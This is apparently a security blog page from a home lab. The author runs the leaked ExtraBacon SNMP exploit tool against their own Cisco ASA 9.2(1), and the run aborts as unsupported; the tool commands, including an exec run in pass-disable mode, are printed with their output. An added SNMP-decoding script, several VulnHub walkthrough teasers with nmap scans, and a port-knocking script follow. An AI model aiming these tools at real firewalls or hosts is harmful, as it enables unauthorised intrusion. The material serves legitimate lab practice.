ExtraBacon Test On ASA Firewall

Hello everyone. I found some free time today and thought I'd give the ExtraBacon exploit from the NSA leak a shot…
There are already some successful articles out there about it, but I wanted to show you what happens on a newer ASA firewall when the exploit fails.

ExtraBacon is a remote code execution exploit against Cisco Adaptive Security Appliance (ASA) devices (the underlying bug was later assigned CVE-2016-6366). The leaked tool carries offsets for ASA versions 8.0(2), 8.0(3), 8.0(4), 8.0(5), 8.2(1), 8.2(2), 8.2(3), 8.2(4), 8.2(5), 8.3(1), 8.3(2), 8.4(1), 8.4(2), 8.4(3) and 8.4(4) (802, 803, … 844 in the tool's own shorthand) and aborts on anything else. It exploits a buffer overflow in the Simple Network Management Protocol (SNMP) service, so it needs a valid community string and network access to an SNMP-enabled interface, and it relies on knowing the target's software version and uptime, which it reads from the sysDescr and sysUpTime objects before deciding whether to fire.

In my case I installed ASA 9.2(1), and of course it didn't work as expected: the tool has no offsets for this release, so its version check refuses to go any further. Keep in mind that this is the tool saying "unsupported", not the appliance saying "patched"; all it proves is that the leaked payload was not built for 9.2(1).
This is the output of the info mode, for reference:


root@trickster0-virtual-machine:/home/trickster0/Desktop/EXBA# python extrabacon_1.1.0.1.py info -t 192.168.0.128 -v -c public
WARNING: No route found for IPv6 destination :: (no default route?)
Logging to /home/trickster0/Desktop/EXBA/concernedparent
[+] Executing: extrabacon_1.1.0.1.py info -t 192.168.0.128 -v -c public
[+] running from /home/trickster0/Desktop/EXBA
[+] probing target via snmp
[+] Connecting to 192.168.0.128:161
****************************************
[+] Data returned
[+] 0000 30 7D 02 01 01 04 06 70 75 62 6C 69 63 A2 70 02 0}.....public.p.
[+] 0010 01 00 02 01 00 02 01 00 30 65 30 3C 06 08 2B 06 ........0e0<..+.
[+] 0020 01 02 01 01 01 00 04 30 43 69 73 63 6F 20 41 64 .......0Cisco Ad
[+] 0030 61 70 74 69 76 65 20 53 65 63 75 72 69 74 79 20 aptive Security
[+] 0040 41 70 70 6C 69 61 6E 63 65 20 56 65 72 73 69 6F Appliance Versio
[+] 0050 6E 20 39 2E 32 28 31 29 30 0F 06 08 2B 06 01 02 n 9.2(1)0...+...
[+] 0060 01 01 03 00 43 03 00 92 E0 30 14 06 08 2B 06 01 ....C....0...+..
[+] 0070 02 01 01 05 00 04 08 63 69 73 63 6F 61 73 61 .......ciscoasa
###[ SNMP ]###
version =
community =
\PDU \
|###[ SNMPresponse ]###
| id =
| error =
| error_index=
| \varbindlist\
| |###[ SNMPvarbind ]###
| | oid =
| | value =
| |###[ SNMPvarbind ]###
| | oid =
| | value =
| |###[ SNMPvarbind ]###
| | oid =
| | value =
[+] End of Data returned

[+] response:
###[ SNMP ]###
version =
community =
\PDU \
|###[ SNMPresponse ]###
| id =
| error =
| error_index=
| \varbindlist\
| |###[ SNMPvarbind ]###
| | oid =
| | value =
| |###[ SNMPvarbind ]###
| | oid =
| | value =
| |###[ SNMPvarbind ]###
| | oid =
| | value =

[+] firewall uptime is 37600 time ticks, or 0:06:16

[+] firewall name is ciscoasa

[-] target is running Cisco Adaptive Security Appliance Version 9.2(1), which is NOT supported
Data stored in key file : unsupported
Data stored in self.vinfo: UNSUPPORTED

To check the key file to see if it really contains what we're claiming:
# cat /home/trickster0/Desktop/EXBA/keys/Y57qgB.key
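The response the tool dumps above is just a BER-encoded SNMPv2c GetResponse carrying sysDescr, sysUpTime and sysName, and the "supported / NOT supported" verdict is a lookup of the version string against the tool's offset table. The following is an added example, not code from the original post or from the leaked tool: it decodes the exact bytes of the first hex dump above and reproduces the info verdict. The SNMP decoding and the OIDs are standard; the version shorthand (8.0(2) becomes 802) and the supported set are taken from the version list at the top of this post, and the function names are my own.

```python
"""Decode the SNMPv2c GetResponse that ExtraBacon's info mode hex-dumps above and
reproduce its version/uptime verdict. Added example, not code from the leaked tool
or from the original post; bytes transcribed from the first dump (uptime 0x92E0)."""
import re

ASA_RESPONSE = bytes.fromhex(
    "307d02010104067075626c6963a27002" "01000201000201003065303c06082b06"
    "0102010101000430436973636f204164" "61707469766520536563757269747920"
    "4170706c69616e63652056657273696f" "6e20392e32283129300f06082b060102"
    "0101030043030092e0301406082b0601" "02010105000408636973636f617361"
)

def _read_tlv(buf, pos):
    """One BER TLV at buf[pos] -> (tag, contents, position after it)."""
    tag, length = buf[pos], buf[pos + 1]
    pos += 2
    if length & 0x80:                   # long form: low 7 bits = number of length octets
        n = length & 0x7F
        length, pos = int.from_bytes(buf[pos:pos + n], "big"), pos + n
    if pos + length > len(buf):
        raise ValueError("truncated TLV")
    return tag, buf[pos:pos + length], pos + length

def _decode_oid(raw):
    """OBJECT IDENTIFIER contents -> dotted string; first octet packs arcs 1 and 2."""
    arcs, value = [raw[0] // 40, raw[0] % 40], 0
    for b in raw[1:]:
        value = (value << 7) | (b & 0x7F)
        if not b & 0x80:
            arcs.append(value)
            value = 0
    return ".".join(map(str, arcs))

def _decode_value(tag, raw):
    if tag == 0x04:                     # OCTET STRING
        return raw.decode("ascii", "replace")
    if tag == 0x02:                     # INTEGER (signed)
        return int.from_bytes(raw, "big", signed=True)
    if tag in (0x41, 0x42, 0x43):       # Counter32, Gauge32, TimeTicks (unsigned)
        return int.from_bytes(raw, "big")
    return raw

def parse_snmp_response(msg):
    """SNMPv1/v2c GetResponse -> {'version', 'community', 'error_status', 'varbinds'}."""
    tag, body, _ = _read_tlv(msg, 0)
    if tag != 0x30:
        raise ValueError("not an SNMP message")
    _, ver, pos = _read_tlv(body, 0)
    _, community, pos = _read_tlv(body, pos)
    pdu_tag, pdu, _ = _read_tlv(body, pos)
    if pdu_tag != 0xA2:
        raise ValueError("not a GetResponse PDU")
    _, _, pos = _read_tlv(pdu, 0)                 # request-id
    _, err, pos = _read_tlv(pdu, pos)             # error-status
    _, _, pos = _read_tlv(pdu, pos)               # error-index
    _, vbl, _ = _read_tlv(pdu, pos)               # VarBindList
    varbinds, pos = {}, 0
    while pos < len(vbl):
        _, vb, pos = _read_tlv(vbl, pos)
        _, oid_raw, vpos = _read_tlv(vb, 0)
        vtag, val, _ = _read_tlv(vb, vpos)
        varbinds[_decode_oid(oid_raw)] = _decode_value(vtag, val)
    return {"version": int.from_bytes(ver, "big", signed=True),   # 1 == SNMPv2c
            "community": community.decode("ascii", "replace"),
            "error_status": int.from_bytes(err, "big", signed=True),
            "varbinds": varbinds}

SYS_DESCR, SYS_UPTIME, SYS_NAME = "1.3.6.1.2.1.1.1.0", "1.3.6.1.2.1.1.3.0", "1.3.6.1.2.1.1.5.0"
# Releases the leaked tool has offsets for, in its own shorthand (8.0(2) -> "802").
TOOL_SUPPORTED = {"802", "803", "804", "805", "821", "822", "823", "824", "825",
                  "831", "832", "841", "842", "843", "844"}

def version_key(sys_descr):
    """'... Version 9.2(1)' -> '921', the form the tool keys its offsets by."""
    m = re.search(r"Version (\d+)\.(\d+)\((\d+)\)", sys_descr)
    return "".join(m.groups()) if m else None

def ticks_to_hms(ticks):
    """sysUpTime is in hundredths of a second; format it as the tool prints it."""
    secs = ticks // 100
    return f"{secs // 3600}:{secs % 3600 // 60:02d}:{secs % 60:02d}"

def target_info(msg):
    """Reproduce the info-mode verdict: version, uptime, name, and whether the tool would fire."""
    vb = parse_snmp_response(msg)["varbinds"]
    key = version_key(vb[SYS_DESCR])
    return {"descr": vb[SYS_DESCR], "version_key": key, "name": vb[SYS_NAME],
            "uptime_ticks": vb[SYS_UPTIME], "uptime": ticks_to_hms(vb[SYS_UPTIME]),
            "tool_supported": key in TOOL_SUPPORTED}

if __name__ == "__main__":
    info = target_info(ASA_RESPONSE)
    print(f"[+] firewall uptime is {info['uptime_ticks']} time ticks, or {info['uptime']}")
    print(f"[+] firewall name is {info['name']}")
    verdict = "supported" if info["tool_supported"] else "NOT supported"
    print(f"[-] target is running {info['descr']}, which is {verdict}")
```

Running it prints the same uptime (37600 ticks, 0:06:16), name and "NOT supported" lines as the tool; swap in the bytes of the second dump (uptime 0xE3BC) and you get 0:09:43. It also makes the exposure explicit: everything the exploit needs from the box came back to a single GetRequest with the community string public, which is the thing to fix regardless of which ASA release is running.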

This is the output of the exec mode:


root@trickster0-virtual-machine:/home/trickster0/Desktop/EXBA# python extrabacon_1.1.0.1.py exec -t 192.168.0.128 -v -c public --mode pass-disable
WARNING: No route found for IPv6 destination :: (no default route?)
Logging to /home/trickster0/Desktop/EXBA/concernedparent
[+] Executing: extrabacon_1.1.0.1.py exec -t 192.168.0.128 -v -c public --mode pass-disable
[+] running from /home/trickster0/Desktop/EXBA
[+] probing target via snmp
[+] Connecting to 192.168.0.128:161
****************************************
[+] Data returned
[+] 0000 30 7D 02 01 01 04 06 70 75 62 6C 69 63 A2 70 02 0}.....public.p.
[+] 0010 01 00 02 01 00 02 01 00 30 65 30 3C 06 08 2B 06 ........0e0<..+.
[+] 0020 01 02 01 01 01 00 04 30 43 69 73 63 6F 20 41 64 .......0Cisco Ad
[+] 0030 61 70 74 69 76 65 20 53 65 63 75 72 69 74 79 20 aptive Security
[+] 0040 41 70 70 6C 69 61 6E 63 65 20 56 65 72 73 69 6F Appliance Versio
[+] 0050 6E 20 39 2E 32 28 31 29 30 0F 06 08 2B 06 01 02 n 9.2(1)0...+...
[+] 0060 01 01 03 00 43 03 00 E3 BC 30 14 06 08 2B 06 01 ....C....0...+..
[+] 0070 02 01 01 05 00 04 08 63 69 73 63 6F 61 73 61 .......ciscoasa
###[ SNMP ]###
version =
community =
\PDU \
|###[ SNMPresponse ]###
| id =
| error =
| error_index=
| \varbindlist\
| |###[ SNMPvarbind ]###
| | oid =
| | value =
| |###[ SNMPvarbind ]###
| | oid =
| | value =
| |###[ SNMPvarbind ]###
| | oid =
| | value =
[+] End of Data returned

[+] response:
###[ SNMP ]###
version =
community =
\PDU \
|###[ SNMPresponse ]###
| id =
| error =
| error_index=
| \varbindlist\
| |###[ SNMPvarbind ]###
| | oid =
| | value =
| |###[ SNMPvarbind ]###
| | oid =
| | value =
| |###[ SNMPvarbind ]###
| | oid =
| | value =

[+] firewall uptime is 58300 time ticks, or 0:09:43

[+] firewall name is ciscoasa

[-] target is running Cisco Adaptive Security Appliance Version 9.2(1), which is NOT supported
Data stored in key file : unsupported
Data stored in self.vinfo: UNSUPPORTED
[+] generating exploit for exec mode pass-disable
[-] unsupported target version, abort

I will try and test some more stuff for fun. Have a nice day everyone!

Pegasus Timbeeeeer!!!! Walkthrough!

Hello everyone, this is the Pegasus VM walkthrough, for practising and having fun 😀
Greetings to everyone involved in creating this great challenge.

I started by running nmap to check all the services that Pegasus has on it!

root@Tesla:~# nmap 192.168.7.138 -p- -A

Starting Nmap 6.49BETA5 ( https://nmap.org ) at 2015-11-05 17:51 EET
Nmap scan report for 192.168.7.138 (192.168.7.138)
Host is up (0.00016s latency).
Not shown: 65531 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 5.9p1 Debian 5ubuntu1.4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 1024 77:89:5b:52:ed:a5:58:6e:8e:09:f3:9e:f1:b0:d9:98 (DSA)
| 2048 d6:62:f5:12:31:36:ed:08:2c:1a:5e:9f:3c:aa:1f:d2 (RSA)
|_ 256 c5:f0:be:e5:c0:9c:28:6e:23:5c:48:38:8b:4a:c4:43 (ECDSA)
111/tcp open rpcbind 2-4 (RPC #100000)
| rpcinfo:
| program version port/proto service
| 100000 2,3,4 111/tcp rpcbind
| 100000 2,3,4 111/udp rpcbind
| 100024 1 36231/udp status
|_ 100024 1 42084/tcp status
8088/tcp open http nginx 1.1.19
42084/tcp open status 1 (RPC #100024)
MAC Address: 00:0C:29:EA:73:26 (VMware)
Device type: general purpose
Running: Linux 3.X
OS CPE: cpe:/o:linux:linux_kernel:3
OS details: Linux 3.2 - 3.19
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Continue reading

Nullbyte %0 walkthrough

Hey everyone, this is the walkthrough for the NullByte VM from VulnHub, created by ly0n.
So we started with an nmap scan to check the open ports and see their banners…

root@Tesla:~# nmap 192.168.7.133 -p- -A

Starting Nmap 6.49BETA5 ( https://nmap.org ) at 2015-10-31 14:35 EET
Nmap scan report for 192.168.7.133 (192.168.7.133)
Host is up (0.00017s latency).
Not shown: 65531 closed ports
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.10 ((Debian))
|_http-server-header: Apache/2.4.10 (Debian)
|_http-title: Null Byte 00 - level 1
111/tcp open rpcbind 2-4 (RPC #100000)
| rpcinfo:
| program version port/proto service
| 100000 2,3,4 111/tcp rpcbind
| 100000 2,3,4 111/udp rpcbind
| 100024 1 34114/tcp status
|_ 100024 1 40102/udp status
777/tcp open ssh OpenSSH 6.7p1 Debian 5 (protocol 2.0)
| ssh-hostkey:
| 1024 16:30:13:d9:d5:55:36:e8:1b:b7:d9:ba:55:2f:d7:44 (DSA)
| 2048 29:aa:7d:2e:60:8b:a6:a1:c2:bd:7c:c8:bd:3c:f4:f2 (RSA)
|_ 256 60:06:e3:64:8f:8a:6f:a7:74:5a:8b:3f:e1:24:93:96 (ECDSA)
34114/tcp open status 1 (RPC #100024)
| rpcinfo:
| program version port/proto service
| 100000 2,3,4 111/tcp rpcbind
| 100000 2,3,4 111/udp rpcbind
| 100024 1 34114/tcp status
|_ 100024 1 40102/udp status
MAC Address: 00:0C:29:AD:C8:3A (VMware)
Device type: general purpose
Running: Linux 3.X
OS CPE: cpe:/o:linux:linux_kernel:3
OS details: Linux 3.2 - 3.19
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

I tried to connect to SSH first, but there was no clue there, so I moved on to the HTTP enumeration.
[screenshot of the index page]
I downloaded that cursed Illuminati-symbol picture (by the way, I have nothing to do with the Illuminati and all that weird stuff, if you saw the triangle at the top of my website 😛) and checked it for steganography.
Continue reading

Tr0ll2: The Revenge Of The Tr0ll!!

Hello everyone, this is Tr0ll 2 as I promised. Time to get root access on the server, since I didn't do much these days, so I will stop blabbing and start explaining what is going on and how everything happened… 😉

Of course, as always, I started with an nmap scan of our dear tr0ll server.

root@kali:~# nmap 192.168.124.131 -sV

Starting Nmap 6.49BETA4 ( https://nmap.org ) at 2015-10-12 18:13 EDT
Nmap scan report for 192.168.124.131 (192.168.124.131)
Host is up (0.00016s latency).
Not shown: 997 closed ports
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 2.0.8 or later
22/tcp open ssh OpenSSH 5.9p1 Debian 5ubuntu1.4 (Ubuntu Linux; protocol 2.0)
80/tcp open http Apache httpd 2.2.22 ((Ubuntu))
MAC Address: 00:0C:29:7C:A4:A9 (VMware)
Service Info: Host: Tr0ll; OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 13.51 seconds

So this is where I started the FTP enumeration. I tried a couple of passwords and some guessing, and I actually got in, looked for files and downloaded the only one I found there.

[screenshot of the FTP session]

The file was password protected, so I left it hanging around for later… :/
Let's move on to the HTTP service enumeration. This is the index page:
[screenshot of the index page]

The source didn't contain anything interesting, so let's move ahead. I thought to check robots.txt, and OK, this is not a damn robots.txt file, this is a huge list!!! I mean, come on!!!
[screenshot of robots.txt]
So, because of this big list, after I tried a few paths and they turned out to be fake…. -_- I made a wordlist out of it and checked it with dirb.
Continue reading

The troller trolled the Tr0ll

Hey everyone, so this is the VM for the tr0ll server! I know it is kind of old, but since I am trolling every day in real life I thought I would try it, so Tr0ll2 is on the way too 😀
Let me add here that this challenge was made by Maleus and hosted by VulnHub!

Anyway, let's stop with all the blabbing and start our challenge.
tr0ll server IP: 192.168.124.141
Kali IP: 192.168.124.134

First I ran an nmap scan.

root@kali:~# nmap 192.168.124.141 -vv -sV

Starting Nmap 6.49BETA4 ( https://nmap.org ) at 2015-10-10 12:01 EDT
NSE: Loaded 33 scripts for scanning.
Initiating ARP Ping Scan at 12:01
Scanning 192.168.124.141 [1 port]
Completed ARP Ping Scan at 12:01, 0.21s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 12:01
Completed Parallel DNS resolution of 1 host. at 12:01, 0.00s elapsed
Initiating SYN Stealth Scan at 12:01
Scanning 192.168.124.141 (192.168.124.141) [1000 ports]
Discovered open port 21/tcp on 192.168.124.141
Discovered open port 22/tcp on 192.168.124.141
Discovered open port 80/tcp on 192.168.124.141
Completed SYN Stealth Scan at 12:01, 1.22s elapsed (1000 total ports)
Initiating Service scan at 12:01
Scanning 3 services on 192.168.124.141 (192.168.124.141)
Completed Service scan at 12:01, 6.10s elapsed (3 services on 1 host)
NSE: Script scanning 192.168.124.141.
NSE: Starting runlevel 1 (of 1) scan.
Initiating NSE at 12:01
Completed NSE at 12:01, 1.27s elapsed
Nmap scan report for 192.168.124.141 (192.168.124.141)
Host is up, received arp-response (0.00031s latency).
Scanned at 2015-10-10 12:01:04 EDT for 9s
Not shown: 997 closed ports
Reason: 997 resets
PORT STATE SERVICE REASON VERSION
21/tcp open ftp syn-ack ttl 64 vsftpd 3.0.2
22/tcp open ssh syn-ack ttl 64 OpenSSH 6.6.1p1 Ubuntu 2ubuntu2 (Ubuntu Linux; protocol 2.0)
80/tcp open http syn-ack ttl 64 Apache httpd 2.4.7 ((Ubuntu))
MAC Address: 00:0C:29:FE:92:AF (VMware)
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 9.55 seconds
Raw packets sent: 1001 (44.028KB) | Rcvd: 1001 (40.040KB)

Continue reading

Lord Of The Root: 1.0.1 write-up

So this is the first write-up: Lord Of The Root 1.0.1, created by this guy, #KookSec.

This is apparently at the level of the OSCP certification, which I plan on taking, so let's see…

After setting it up on VMware and running the LOTR server, we start up Kali and begin the process…..

After a quick search of my LAN to find the target's IP, we find that it is 192.168.124.138; by the way, I am 192.168.124.134.

So let's start by scanning the target machine for open ports and stuff.

root@kali:~# nmap 192.168.124.138 -sT -p- -A
Starting Nmap 6.49BETA4 ( https://nmap.org ) at 2015-10-06 18:52 EDT
Stats: 0:00:04 elapsed; 0 hosts completed (1 up), 1 undergoing Connect Scan
Connect Scan Timing: About 0.69% done
Stats: 0:00:09 elapsed; 0 hosts completed (1 up), 1 undergoing Connect Scan
Connect Scan Timing: About 3.67% done; ETC: 18:55 (0:03:04 remaining)
Nmap scan report for 192.168.124.138 (192.168.124.138)
Host is up (0.0011s latency).
Not shown: 65534 filtered ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 6.6.1p1 Ubuntu 2ubuntu2.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 1024 3c:3d:e3:8e:35:f9:da:74:20:ef:aa:49:4a:1d:ed:dd (DSA)
| 2048 85:94:6c:87:c9:a8:35:0f:2c:db:bb:c1:3f:2a:50:c1 (RSA)
|_ 256 f3:cd:aa:1d:05:f2:1e:8c:61:87:25:b6:f4:34:45:37 (ECDSA)
MAC Address: 00:0C:29:8F:4B:CE (VMware)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 3.X
OS CPE: cpe:/o:linux:linux_kernel:3
OS details: Linux 3.11 - 3.14, Linux 3.18, Linux 3.2 - 3.19
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
TRACEROUTE
HOP RTT ADDRESS
1 1.07 ms 192.168.124.138 (192.168.124.138)

We can see that port 22 (SSH) is open, so let's try to connect and see what we can get from it.

[screenshot of the SSH banner]

It says that it wants us to knock 😛 and it is as easy as 1, 2, 3, so I am guessing I should knock on ports 1, 2, 3.

I used this script to knock:
Continue reading
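The knock the author describes, as an added example (not the author's script, which is behind the cut and not shown on this page): one TCP SYN to ports 1, 2 and 3 in order against 192.168.124.138 (both taken from the post), then a banner grab on 22. The only assumption is that the knock daemon on the box reacts to the SYNs in sequence, which is how knockd-style daemons work; function names and timeouts are mine. The scan above showed every port but 22 as filtered, so each knock will time out rather than get a RST, and the timeout is what keeps the sequence inside a daemon's time window.

```python
"""Port knock on 1, 2, 3 and then grab the SSH banner. Added example, not the
author's script; target and sequence are from the post, the rest is assumed."""
import socket
import time


def _tcp_probe(host, port, timeout):
    """One TCP connect attempt. The SYN is what the knock daemon sees; the outcome is only informational."""
    try:
        with socket.create_connection((host, port), timeout=timeout):
            return "open"
    except ConnectionRefusedError:
        return "closed"      # RST came back; the SYN still counted as a knock
    except (socket.timeout, OSError):
        return "filtered"    # dropped, as nmap showed for everything but 22 on this host


def knock(host, ports, timeout=0.5, delay=0.2, probe=_tcp_probe):
    """Knock each port in sequence; returns [(port, outcome), ...] in knock order.

    Without a short timeout each connect to a filtered port would hang for the OS
    default, and knock daemons (knockd, for example) only accept a sequence that
    completes within their time window. `probe` is injectable so the sequencing can
    be exercised offline.
    """
    results = []
    for port in ports:
        results.append((port, probe(host, port, timeout)))
        time.sleep(delay)
    return results


def grab_banner(host, port=22, timeout=3.0):
    """Read the first line the service sends (the SSH banner here) after the knock."""
    with socket.create_connection((host, port), timeout=timeout) as s:
        return s.recv(256).decode("ascii", "replace").strip()


if __name__ == "__main__":
    target = "192.168.124.138"          # from the post
    for port, outcome in knock(target, [1, 2, 3]):
        print(f"[*] knock {port}: {outcome}")
    print(grab_banner(target))
```

If the knock worked, the banner after it will differ from the one in the screenshot; if the daemon wants a different order or a different protocol (UDP knocks exist too), only the probe function needs to change.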